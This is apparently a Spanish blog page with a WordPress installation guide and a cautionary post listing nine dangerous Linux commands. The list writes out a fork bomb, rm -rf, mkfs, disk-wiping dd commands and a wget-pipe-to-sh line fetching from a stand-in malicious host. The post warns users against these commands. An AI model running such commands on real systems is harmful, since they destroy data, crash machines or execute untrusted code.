martes, 22 de noviembre de 2016

Instalación de WordPress

En esta oportunidad se mostrara como instalar WordPress 

1.- Descargar la Ultima Versión de WordPress del siguiente Link

https://ve.wordpress.org/txt-download/

2.- Descomprime el archivo en una carpeta vacía.
3.- Abre wp-config-sample.php con un editor de texto como Notepad o similar y rellena los datos de tu conexión a la base de datos.
4.- Guarda el archivo como wp-config.php.
5.- Sube todo a tu servidor.
Ve a tu sitio y abre http://www.tudominio.com/wp-admin/install.php en tu navegador. Si hay algún error, haz el favor de comprobar tu archivo wp-config.php e intentar otra vez. Si vuelve a fallar, visita los foros de ayuda con todos los datos que puedas aportar.
5.- Elige tu nombre de usuario y contraseña. Si dejas ambos campos en blanco, se te asignara el nombre de usuario admin y una contraseña al azar.
6.- Se te enviará a la página para que inicies sesión, donde deberás introducir el nombre de usuario y contraseña que seleccionaste en el paso anterior. Si la contraseña te fue proporcionada por el instalador, te recomendamos cambiarla haciendo click en ‘Perfil’.
Eso es todo. ¡Disfruta!

Instalar el archivo de idioma en un sitio existente
Si ya tienes una instalación en línea de la misma versión de WordPress, pero en idioma inglés, puedes cambiar el idioma de tu página usando solamente el archivo de la traducción incluido en el paquete siguiendo estos pasos:

Busca el archivo es_VE.mo en la carpeta  /wp-content/languages/ del paquete y súbelo al directorio /wp-content/languages/ de tu instalación.
Modifica con cualquier editor de texto el archivo  wp-config.php que se encuentra en la carpeta raíz de tu instalación, cambiando el valor define ('WPLANG', '');  por  define ('WPLANG', 'es_VE');
Ahora la administración de tu WordPress aparecerá en español de Venezuela.

Actualizar manualmente
Antes de actualizar nada, asegúrate de tener copias de respaldo de los archivos que hayas modificado.
Haz una Copia de Seguridad de tus archivos y tu base de datos.
Sube los nuevos archivos.
Dirige tu navegador a http://www.tudominio.com/wp-admin/upgrade.php.
Cambios a las plantillas del tema

Si has personalizado las plantillas del tema, puede que tengas que hacer algunos cambios relevantes cuando actualizes entre versiones mayores.

martes, 15 de noviembre de 2016

9 comandos peligrosos en Linux


El shell de Linux es muy potente y sólo una simple instrucción podría llevarnos a eliminar sin querer directorios, archivos, el raíz, etc. Linux no suele pedir confirmación sino que ejecuta el comando de inmediato pudiendo causar la pérdida de datos útiles.
Echa un vistazo a los 9 comandos más "peligrosos":



1. bomba fork
:(){ :|: & };: es una función bash. Una vez ejecutada, se repite varias veces hasta que el sistema se bloquea. Podríamos decir que causa una denegación de servicio hasta el punto que tenemos que reiniciar el servidor.

2. mv directorio/dev/null
mv directorio/dev/null es otro comando arriesgado. dev/null o el dispositivo null descarta todos los datos escritos en el pero informa que la operación de escritura se ha realizado correctamente. Es también conocido como agujero negro o bit bucked.

3. rm -rf 
El comando rm -rf es para borrar archivos o directorios. Siempre hay que tener mucho cuidado al utilizarlo. El parámetro '-r' elimina el contenido de una carpeta de forma recursiva y el parámetro '-f' fuerza la eliminación sin preguntar.

4. mkfs
mkfs puede ser un comando peligroso si no conoces su propósito. Cualquier cosa después de mkfs será formateada y reemplazada por un sistema de archivos en blanco: mkfs, mkfs.ext3, mkfs.bfs, mkfs.ext2, mkfs.minix, mkfs.msdos, mkfs.reiserfs, mkfs.vfat, mkfs.cramfs (este último sin necesidad de tener permisos de administración).

5. bomba tar
Se trata de un archivo empaquetado que "explota" en miles o millones de archivos con nombres similares a los archivos existentes en el directorio actual en vez de en un directorio nuevo. La forma de evitarlo sería crear y entrar en un directorio nuevo antes de desempaquetarlo o listar el contenido previamente con -t.

6. dd
El comando dd se utiliza para copiar y convertir particiones del disco duro. Sin embargo, puede llegar a ser perjudicial si se especifica el destino equivocado.
El comando puede ser cualquiera de los siguientes:
    dd if=/dev/hda of=/dev/hdb    dd if=/dev/hda of=/dev/sdb    dd if=something of=/dev/hda    dd if=something of=/dev/sda    dd if=/dev/zero of=/dev/had (will zero out the whole primary hard drive)

7. Código shell script
Alguien podría enviarte un enlace para que descarges y ejecutes un shell script. Por ejemplo: wget http://some_malicious_source -O- | sh

8. Código fuente malicioso
Alguien podría facilitarte código fuente para compilarlo. Este código podría parecer un código normal, pero en realidad tratarse de algún código malicioso oculto entre código fuente normal que puede causar daños a tu sistema. Para evitar ser víctima de este tipo de ataque, sólo debes aceptar y compilar el código fuente de fuentes confiables.

9. Bomba de descompresión
Una bomba zip es un archivo que parece ser muy pequeño, de unos pocos KB, pero que cuando se descomprime lo hace en cientos de GB de datos pudiendo llenar tu disco duro para reducir el rendimiento del sistema. Si os acordáis hace tiempo ya hablamos en el blog de ellas.